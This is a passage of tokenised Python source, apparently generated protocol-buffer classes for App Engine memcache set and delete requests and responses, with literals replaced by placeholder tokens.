<EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_set_policy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . expiration_time_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_set_policy ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_expiration_time ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_cas_id ( d . get64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_for_cas ( d . getBoolean ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . flags_ ) ) <EOL> if self . has_set_policy_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . set_policy_ ) ) <EOL> if self . has_expiration_time_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . expiration_time_ ) ) <EOL> if self . has_cas_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed64 ( self . cas_id_ ) ) <EOL> if self . has_for_cas_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatBool ( self . for_cas_ ) ) <EOL> return res <EOL> class MemcacheSetRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> SET = <NUM_LIT:1> <EOL> ADD = <NUM_LIT:2> <EOL> REPLACE = <NUM_LIT:3> <EOL> CAS = <NUM_LIT:4> <EOL> _SetPolicy_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } <EOL> def SetPolicy_Name ( cls , x ) : return cls . _SetPolicy_NAMES . get ( x , "<STR_LIT>" ) <EOL> SetPolicy_Name = classmethod ( SetPolicy_Name ) <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheSetRequest_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemkey = <NUM_LIT:2> <EOL> kItemvalue = <NUM_LIT:3> <EOL> kItemflags = <NUM_LIT:4> <EOL> kItemset_policy = <NUM_LIT:5> <EOL> kItemexpiration_time = <NUM_LIT:6> <EOL> kItemcas_id = <NUM_LIT:8> <EOL> kItemfor_cas = <NUM_LIT:9> <EOL> kname_space = <NUM_LIT:7> <EOL> koverride = <NUM_LIT:10> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:key>" , <EOL> <NUM_LIT:3> : "<STR_LIT:value>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> } , <NUM_LIT:10> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:7> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:8> : ProtocolBuffer . Encoder . DOUBLE , <EOL> <NUM_LIT:9> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:10> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:10> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheSetResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> STORED = <NUM_LIT:1> <EOL> NOT_STORED = <NUM_LIT:2> <EOL> ERROR = <NUM_LIT:3> <EOL> EXISTS = <NUM_LIT:4> <EOL> _SetStatusCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } <EOL> def SetStatusCode_Name ( cls , x ) : return cls . _SetStatusCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> SetStatusCode_Name = classmethod ( SetStatusCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> self . set_status_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def set_status_size ( self ) : return len ( self . set_status_ ) <EOL> def set_status_list ( self ) : return self . set_status_ <EOL> def set_status ( self , i ) : <EOL> return self . set_status_ [ i ] <EOL> def set_set_status ( self , i , x ) : <EOL> self . set_status_ [ i ] = x <EOL> def add_set_status ( self , x ) : <EOL> self . set_status_ . append ( x ) <EOL> def clear_set_status ( self ) : <EOL> self . set_status_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . set_status_size ( ) ) : self . add_set_status ( x . set_status ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . set_status_ ) != len ( x . set_status_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . set_status_ , x . set_status_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . set_status_ ) <EOL> for i in xrange ( len ( self . set_status_ ) ) : n += self . lengthVarInt64 ( self . set_status_ [ i ] ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . set_status_ ) <EOL> for i in xrange ( len ( self . set_status_ ) ) : n += self . lengthVarInt64 ( self . set_status_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_set_status ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . set_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . set_status_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . set_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . set_status_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . add_set_status ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . set_status_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kset_status = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheDeleteRequest_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_delete_time_ = <NUM_LIT:0> <EOL> delete_time_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def delete_time ( self ) : return self . delete_time_ <EOL> def set_delete_time ( self , x ) : <EOL> self . has_delete_time_ = <NUM_LIT:1> <EOL> self . delete_time_ = x <EOL> def clear_delete_time ( self ) : <EOL> if self . has_delete_time_ : <EOL> self . has_delete_time_ = <NUM_LIT:0> <EOL> self . delete_time_ = <NUM_LIT:0> <EOL> def has_delete_time ( self ) : return self . has_delete_time_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_delete_time ( ) ) : self . set_delete_time ( x . delete_time ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_delete_time_ != x . has_delete_time_ : return <NUM_LIT:0> <EOL> if self . has_delete_time_ and self . delete_time_ != x . delete_time_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_delete_time_ ) : n += <NUM_LIT:5> <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_delete_time_ ) : n += <NUM_LIT:5> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_delete_time ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delete_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . delete_time_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delete_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . delete_time_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_delete_time ( d . get32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_delete_time_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . delete_time_ ) ) <EOL> return res <EOL> class MemcacheDeleteRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheDeleteRequest_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemkey = <NUM_LIT:2> <EOL> kItemdelete_time = <NUM_LIT:3> <EOL> kname_space = <NUM_LIT:4> <EOL> koverride = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:key>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = 